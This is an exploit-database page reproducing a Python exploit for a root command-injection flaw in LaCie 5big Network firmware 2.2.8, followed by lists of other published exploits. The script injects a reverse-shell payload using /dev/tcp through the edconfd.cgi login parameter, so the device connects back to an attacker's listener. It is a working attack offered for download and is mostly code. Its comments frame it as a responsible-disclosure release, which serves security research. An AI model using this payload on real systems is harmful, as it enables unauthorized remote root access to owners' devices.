Menu

Search for hundreds of thousands of exploits

"LaCie 5big Network 2.2.8 - Command Injection"

Author

Exploit author

"Timo Sablowski"

Platform

Exploit platform

cgi

Release date

Exploit published date

2017-12-07

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
#!/usr/bin/python

# Exploit Title: LaCie 5big Network 2.2.8 Command Injection
# Date: 2017-12-04
# Exploit Author: Timo Sablowski
# Contact: ${lastname}@tyntec.com
# Vendor Homepage: http://www.lacie.com
# Software Link: http://www.lacie.com/files/lacie-content/download/drivers/5%20Big%20Network.zip
# Version: 2.2.8
# Tested on: Linux
# Platform: Hardware
#
# Command Injection Vulnerability (with root privileges) in LaCie's
# 5big Network appliance running firmware version 2.2.8.
# Just open a netcat listener and run this script to receive a reverse
# shell to exploit the vulnerability.
#
# This exploit has been released to Seagate in accordance to their
# responsible disclosure program and is meant to be used for testing
# and educational purposes only.
# Please do not use it against any system without prior permission.
# Use at your own risk.
#
# Timeline:
# 	2017-09-13: Discovery
#	2017-10-04: Reporting to Seagate
#		asking to fix the issue until 2017-12-04
#	2017-11-07: Seagate stating to not fix the vulnerability as the
#		product has been EOL for a long time


import sys, getopt, os, urllib

url_addition = "/cgi-bin/public/edconfd.cgi?method=getChallenge&login="
blank_payload = "admin|#' ||`/bin/sh -i > /dev/tcp/IP/PORT 0<&1 2>&1` #\\\""

def help():
	print "Usage:"
	print "%s -u <baseurl> -l <listener> -p <port>" %os.path.basename(sys.argv[0])
	print ""
	print "<baseurl> identifies the target's URL, e.g. http://10.0.0.1:8080"
	print "<listener> sets the IP where the attacked system connects back to"
	print "<port> defines the listening port"
	print ""
	print "Example: attack LaCie system to connect back to a remote machine (do not forget to open a netcat session)"
	print "\t %s -u http://10.0.0.1 -l 192.168.0.1 -p 4444" %os.path.basename(sys.argv[0])


def create_payload(blank_payload, listener, port):
	print "[+] Generating payload with IP %s and port %s" %(listener, str(port))
	payload = blank_payload.replace("IP", listener).replace("PORT", str(port))
	payload = urllib.quote(payload, safe='')
	return payload


def send_payload(injected_url):
	print "[+] Sending payload, this might take a few seconds ..."
	print "[+] Check your listener"
	try:
		urllib.urlopen(injected_url)
	except:
		raise


def main():
	try:
		opts, args = getopt.getopt(sys.argv[1:],"hu:l:p:")
	except:
		help()
		sys.exit(1)
	for opt, arg in opts:
		if opt == '-h':
			help()
			sys.exit()
		elif opt in ("-u"):
			url = arg
		elif opt in ("-l"):
			listener = arg
		elif opt in ("-p"):
			port = int(arg)
	try:
		url
		listener
		port
	except:
		help()
		sys.exit(1)

	payload = create_payload(blank_payload, listener, port)
 	injected_url = "%s%s%s" %(url, url_addition, payload)
 	send_payload(injected_url)



if __name__ == "__main__":
	main()
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-11-19 "Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection" webapps cgi "Gabriele Zuddas"
2020-10-29 "Mailman 1.x > 2.1.23 - Cross Site Scripting (XSS)" webapps cgi "Valerio Alessandroni"
2020-04-23 "Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit)" webapps cgi "Dhiraj Mishra"
2020-04-10 "Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal" webapps cgi "Basim Alabdullah"
2020-03-30 "Zen Load Balancer 3.10.1 - Remote Code Execution" webapps cgi "Cody Sixteen"
2020-02-11 "CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting" webapps cgi Luca.Chiou
2019-09-09 "Rifatron Intelligent Digital Security System - 'animate.cgi' Stream Disclosure" webapps cgi LiquidWorm
2019-07-12 "Citrix SD-WAN Appliance 10.2.2 - Authentication Bypass / Remote Command Execution" webapps cgi "Chris Lyne"
2019-02-18 "Master IP CAM 01 3.3.4.2103 - Remote Command Execution" webapps cgi "Raffaele Sabato"
2019-02-11 "IPFire 2.21 - Cross-Site Scripting" webapps cgi "Ozer Goker"
Release Date Title Type Platform Author
2017-12-07 "LaCie 5big Network 2.2.8 - Command Injection" remote cgi "Timo Sablowski" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected